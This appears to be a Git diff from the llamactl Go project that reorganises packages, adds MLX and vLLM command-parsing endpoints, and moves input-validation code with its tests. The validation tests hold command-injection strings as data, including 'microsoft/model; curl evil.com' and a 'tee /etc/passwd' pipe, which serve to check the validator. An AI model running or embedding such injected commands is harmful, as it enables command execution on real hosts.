w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
mlxOptions, err := mlx.ParseMlxCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
// Currently only support mlx_lm backend type
backendType := backends.BackendTypeMlxLm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
MlxServerOptions: mlxOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseVllmCommand godoc
// @Summary Parse vllm serve command
// @Description Parses a vLLM serve command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/vllm/parse-command [post]
func (h *Handler) ParseVllmCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
vllmOptions, err := vllm.ParseVllmCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
backendType := backends.BackendTypeVllm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
VllmServerOptions: vllmOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}

View File

@@ -1,10 +1,11 @@
package llamactl
package server
import (
"crypto/rand"
"crypto/subtle"
"encoding/hex"
"fmt"
"llamactl/pkg/config"
"log"
"net/http"
"os"
@@ -26,7 +27,7 @@ type APIAuthMiddleware struct {
}
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {
var generated bool = false
@@ -35,25 +36,25 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
if config.RequireManagementAuth && len(config.ManagementKeys) == 0 {
if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
key := generateAPIKey(KeyTypeManagement)
managementAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
}
for _, key := range config.ManagementKeys {
for _, key := range authCfg.ManagementKeys {
managementAPIKeys[key] = true
}
if config.RequireInferenceAuth && len(config.InferenceKeys) == 0 {
if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
key := generateAPIKey(KeyTypeInference)
inferenceAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
}
for _, key := range config.InferenceKeys {
for _, key := range authCfg.InferenceKeys {
inferenceAPIKeys[key] = true
}
@@ -66,9 +67,9 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
}
return &APIAuthMiddleware{
requireInferenceAuth: config.RequireInferenceAuth,
requireInferenceAuth: authCfg.RequireInferenceAuth,
inferenceKeys: inferenceAPIKeys,
requireManagementAuth: config.RequireManagementAuth,
requireManagementAuth: authCfg.RequireManagementAuth,
managementKeys: managementAPIKeys,
}
}

View File

@@ -1,18 +1,18 @@
package llamactl_test
package server_test
import (
"llamactl/pkg/config"
"llamactl/pkg/server"
"net/http"
"net/http/httptest"
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestAuthMiddleware(t *testing.T) {
tests := []struct {
name string
keyType llamactl.KeyType
keyType server.KeyType
inferenceKeys []string
managementKeys []string
requestKey string
@@ -22,7 +22,7 @@ func TestAuthMiddleware(t *testing.T) {
// Valid key tests
{
name: "valid inference key for inference",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-valid123",
method: "GET",
@@ -30,7 +30,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "valid management key for inference", // Management keys work for inference
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
@@ -38,7 +38,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "valid management key for management",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
@@ -48,7 +48,7 @@ func TestAuthMiddleware(t *testing.T) {
// Invalid key tests
{
name: "inference key for management should fail",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
inferenceKeys: []string{"sk-inference-user123"},
requestKey: "sk-inference-user123",
method: "GET",
@@ -56,7 +56,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "invalid inference key",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-invalid",
method: "GET",
@@ -64,7 +64,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "missing inference key",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "GET",
@@ -72,7 +72,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "invalid management key",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "sk-management-invalid",
method: "GET",
@@ -80,7 +80,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "missing management key",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "GET",
@@ -90,7 +90,7 @@ func TestAuthMiddleware(t *testing.T) {
// OPTIONS requests should always pass
{
name: "OPTIONS request bypasses inference auth",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "OPTIONS",
@@ -98,7 +98,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "OPTIONS request bypasses management auth",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "OPTIONS",
@@ -108,7 +108,7 @@ func TestAuthMiddleware(t *testing.T) {
// Cross-key-type validation
{
name: "management key works for inference endpoint",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{},
managementKeys: []string{"sk-management-admin"},
requestKey: "sk-management-admin",
@@ -119,11 +119,11 @@ func TestAuthMiddleware(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
config := llamactl.AuthConfig{
cfg := config.AuthConfig{
InferenceKeys: tt.inferenceKeys,
ManagementKeys: tt.managementKeys,
}
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(cfg)
// Create test request
req := httptest.NewRequest(tt.method, "/test", nil)
@@ -133,12 +133,12 @@ func TestAuthMiddleware(t *testing.T) {
// Create test handler using the appropriate middleware
var handler http.Handler
if tt.keyType == llamactl.KeyTypeInference {
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
@@ -170,17 +170,17 @@ func TestAuthMiddleware(t *testing.T) {
func TestGenerateAPIKey(t *testing.T) {
tests := []struct {
name string
keyType llamactl.KeyType
keyType server.KeyType
}{
{"inference key generation", llamactl.KeyTypeInference},
{"management key generation", llamactl.KeyTypeManagement},
{"inference key generation", server.KeyTypeInference},
{"management key generation", server.KeyTypeManagement},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test auto-generation by creating config that will trigger it
var config llamactl.AuthConfig
if tt.keyType == llamactl.KeyTypeInference {
var config config.AuthConfig
if tt.keyType == server.KeyTypeInference {
config.RequireInferenceAuth = true
config.InferenceKeys = []string{} // Empty to trigger generation
} else {
@@ -189,19 +189,19 @@ func TestGenerateAPIKey(t *testing.T) {
}
// Create middleware - this should trigger key generation
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(config)
// Test that auth is required (meaning a key was generated)
req := httptest.NewRequest("GET", "/", nil)
recorder := httptest.NewRecorder()
var handler http.Handler
if tt.keyType == llamactl.KeyTypeInference {
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
@@ -214,18 +214,18 @@ func TestGenerateAPIKey(t *testing.T) {
}
// Test uniqueness by creating another middleware instance
middleware2 := llamactl.NewAPIAuthMiddleware(config)
middleware2 := server.NewAPIAuthMiddleware(config)
req2 := httptest.NewRequest("GET", "/", nil)
recorder2 := httptest.NewRecorder()
if tt.keyType == llamactl.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
} else {
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
@@ -307,21 +307,21 @@ func TestAutoGeneration(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
config := llamactl.AuthConfig{
cfg := config.AuthConfig{
RequireInferenceAuth: tt.requireInference,
RequireManagementAuth: tt.requireManagement,
InferenceKeys: tt.providedInference,
ManagementKeys: tt.providedManagement,
}
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(cfg)
// Test inference behavior if inference auth is required
if tt.requireInference {
req := httptest.NewRequest("GET", "/v1/models", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
@@ -338,7 +338,7 @@ func TestAutoGeneration(t *testing.T) {
req := httptest.NewRequest("GET", "/api/v1/instances", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))

View File

@@ -1,4 +1,4 @@
package llamactl
package server
type OpenAIListInstancesResponse struct {
Object string `json:"object"`

View File

@@ -1,4 +1,4 @@
package llamactl
package server
import (
"fmt"
@@ -8,7 +8,7 @@ import (
"github.com/go-chi/cors"
httpSwagger "github.com/swaggo/http-swagger"
_ "llamactl/docs"
_ "llamactl/apidocs"
"llamactl/webui"
)
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Add CORS middleware
r.Use(cors.Handler(cors.Options{
AllowedOrigins: handler.config.Server.AllowedOrigins,
AllowedOrigins: handler.cfg.Server.AllowedOrigins,
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
ExposedHeaders: []string{"Link"},
@@ -27,9 +27,9 @@ func SetupRouter(handler *Handler) *chi.Mux {
}))
// Add API authentication middleware
authMiddleware := NewAPIAuthMiddleware(handler.config.Auth)
authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)
if handler.config.Server.EnableSwagger {
if handler.cfg.Server.EnableSwagger {
r.Get("/swagger/*", httpSwagger.Handler(
httpSwagger.URL("/swagger/doc.json"),
))
@@ -38,14 +38,26 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Define routes
r.Route("/api/v1", func(r chi.Router) {
if authMiddleware != nil && handler.config.Auth.RequireManagementAuth {
if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
}
r.Route("/server", func(r chi.Router) {
r.Get("/help", handler.HelpHandler())
r.Get("/version", handler.VersionHandler())
r.Get("/devices", handler.ListDevicesHandler())
r.Get("/version", handler.VersionHandler()) // Get server version
// Backend-specific endpoints
r.Route("/backends", func(r chi.Router) {
r.Route("/llama-cpp", func(r chi.Router) {
r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.LlamaServerListDevicesHandler())
r.Post("/parse-command", handler.ParseLlamaCommand())
})
r.Route("/mlx", func(r chi.Router) {
r.Post("/parse-command", handler.ParseMlxCommand())
})
r.Route("/vllm", func(r chi.Router) {
r.Post("/parse-command", handler.ParseVllmCommand())
})
})
// Instance management endpoints
@@ -73,7 +85,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
r.Route(("/v1"), func(r chi.Router) {
if authMiddleware != nil && handler.config.Auth.RequireInferenceAuth {
if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
}

10
pkg/testutil/helpers.go Normal file
View File

@@ -0,0 +1,10 @@
package testutil
// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
return &b
}
func IntPtr(i int) *int {
return &i
}

View File

@@ -1,116 +0,0 @@
package llamactl
import (
"fmt"
"reflect"
"regexp"
)
// Simple security validation that focuses only on actual injection risks
var (
// Block shell metacharacters that could enable command injection
dangerousPatterns = []*regexp.Regexp{
regexp.MustCompile(`[;&|$` + "`" + `]`), // Shell metacharacters
regexp.MustCompile(`\$\(.*\)`), // Command substitution $(...)
regexp.MustCompile("`.*`"), // Command substitution backticks
regexp.MustCompile(`[\x00-\x1F\x7F]`), // Control characters (including newline, tab, null byte, etc.)
}
// Simple validation for instance names
validNamePattern = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)
)
type ValidationError error
// validateStringForInjection checks if a string contains dangerous patterns
func validateStringForInjection(value string) error {
for _, pattern := range dangerousPatterns {
if pattern.MatchString(value) {
return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
}
}
return nil
}
// ValidateInstanceOptions performs minimal security validation
func ValidateInstanceOptions(options *CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation - only check for reasonable ranges
if options.Port < 0 || options.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range"))
}
return nil
}
// validateStructStrings recursively validates all string fields in a struct
func validateStructStrings(v any, fieldPath string) error {
val := reflect.ValueOf(v)
if val.Kind() == reflect.Ptr {
val = val.Elem()
}
if val.Kind() != reflect.Struct {
return nil
}
typ := val.Type()
for i := 0; i < val.NumField(); i++ {
field := val.Field(i)
fieldType := typ.Field(i)
if !field.CanInterface() {
continue
}
fieldName := fieldType.Name
if fieldPath != "" {
fieldName = fieldPath + "." + fieldName
}
switch field.Kind() {
case reflect.String:
if err := validateStringForInjection(field.String()); err != nil {
return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String {
for j := 0; j < field.Len(); j++ {
if err := validateStringForInjection(field.Index(j).String()); err != nil {
return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
}
}
}
case reflect.Struct:
if err := validateStructStrings(field.Interface(), fieldName); err != nil {
return err
}
}
}
return nil
}
func ValidateInstanceName(name string) error {
// Validate instance name
if name == "" {
return ValidationError(fmt.Errorf("name cannot be empty"))
}
if !validNamePattern.MatchString(name) {
return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
}
if len(name) > 50 {
return ValidationError(fmt.Errorf("name too long (max 50 characters)"))
}
return nil
}

View File

@@ -0,0 +1,174 @@
package validation
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"reflect"
"regexp"
)
// Simple security validation that focuses only on actual injection risks
var (
// Block shell metacharacters that could enable command injection
dangerousPatterns = []*regexp.Regexp{
regexp.MustCompile(`[;&|$` + "`" + `]`), // Shell metacharacters
regexp.MustCompile(`\$\(.*\)`), // Command substitution $(...)
regexp.MustCompile("`.*`"), // Command substitution backticks
regexp.MustCompile(`[\x00-\x1F\x7F]`), // Control characters (including newline, tab, null byte, etc.)
}
// Simple validation for instance names
validNamePattern = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)
)
type ValidationError error
// validateStringForInjection checks if a string contains dangerous patterns
func validateStringForInjection(value string) error {
for _, pattern := range dangerousPatterns {
if pattern.MatchString(value) {
return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
}
}
return nil
}
// ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
case backends.BackendTypeMlxLm:
return validateMlxOptions(options)
case backends.BackendTypeVllm:
return validateVllmOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
}
return nil
}
// validateMlxOptions validates MLX backend specific options
func validateMlxOptions(options *instance.CreateInstanceOptions) error {
if options.MlxServerOptions == nil {
return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
}
if err := validateStructStrings(options.MlxServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port))
}
return nil
}
// validateVllmOptions validates vLLM backend specific options
func validateVllmOptions(options *instance.CreateInstanceOptions) error {
if options.VllmServerOptions == nil {
return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.VllmServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port))
}
return nil
}
// validateStructStrings recursively validates all string fields in a struct
func validateStructStrings(v any, fieldPath string) error {
val := reflect.ValueOf(v)
if val.Kind() == reflect.Ptr {
val = val.Elem()
}
if val.Kind() != reflect.Struct {
return nil
}
typ := val.Type()
for i := 0; i < val.NumField(); i++ {
field := val.Field(i)
fieldType := typ.Field(i)
if !field.CanInterface() {
continue
}
fieldName := fieldType.Name
if fieldPath != "" {
fieldName = fieldPath + "." + fieldName
}
switch field.Kind() {
case reflect.String:
if err := validateStringForInjection(field.String()); err != nil {
return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String {
for j := 0; j < field.Len(); j++ {
if err := validateStringForInjection(field.Index(j).String()); err != nil {
return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
}
}
}
case reflect.Struct:
if err := validateStructStrings(field.Interface(), fieldName); err != nil {
return err
}
}
}
return nil
}
func ValidateInstanceName(name string) (string, error) {
// Validate instance name
if name == "" {
return "", ValidationError(fmt.Errorf("name cannot be empty"))
}
if !validNamePattern.MatchString(name) {
return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
}
if len(name) > 50 {
return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
}
return name, nil
}

View File

@@ -1,10 +1,13 @@
package llamactl_test
package validation_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"llamactl/pkg/validation"
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestValidateInstanceName(t *testing.T) {
@@ -39,16 +42,23 @@ func TestValidateInstanceName(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceName(tt.input)
name, err := validation.ValidateInstanceName(tt.input)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
}
if tt.wantErr {
return // Skip further checks if we expect an error
}
// If no error, check that the name is returned as expected
if name != tt.input {
t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
}
})
}
}
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
err := llamactl.ValidateInstanceOptions(nil)
err := validation.ValidateInstanceOptions(nil)
if err == nil {
t.Error("Expected error for nil options")
}
@@ -73,13 +83,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: tt.port,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
}
@@ -126,13 +137,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: tt.value,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
}
@@ -163,13 +175,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Lora: tt.array,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
}
@@ -181,13 +194,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
// Test that injection in any field is caught
tests := []struct {
name string
options *llamactl.CreateInstanceOptions
options *instance.CreateInstanceOptions
wantErr bool
}{
{
name: "injection in model field",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -196,8 +210,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "injection in log file",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -206,8 +221,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "all safe fields",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -221,7 +237,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceOptions(tt.options)
err := validation.ValidateInstanceOptions(tt.options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
}
@@ -231,11 +247,12 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
// Test that non-string fields don't interfere with validation
options := &llamactl.CreateInstanceOptions{
AutoRestart: boolPtr(true),
MaxRestarts: intPtr(5),
RestartDelay: intPtr(10),
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,
@@ -247,17 +264,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if err != nil {
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
}
}
// Helper functions for pointer fields
func boolPtr(b bool) *bool {
return &b
}
func intPtr(i int) *int {
return &i
}

100
webui/package-lock.json generated
View File

@@ -19,6 +19,7 @@
"lucide-react": "^0.525.0",
"react": "^19.1.0",
"react-dom": "^19.1.0",
"sonner": "^2.0.7",
"tailwind-merge": "^3.3.1",
"tailwindcss": "^4.1.11",
"zod": "^4.0.5"
@@ -42,7 +43,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.0.5",
"vite": "^7.1.5",
"vitest": "^3.2.4"
}
},
@@ -2109,6 +2110,60 @@
"node": ">=14.0.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/core": {
"version": "1.4.3",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"@emnapi/wasi-threads": "1.0.2",
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/runtime": {
"version": "1.4.3",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
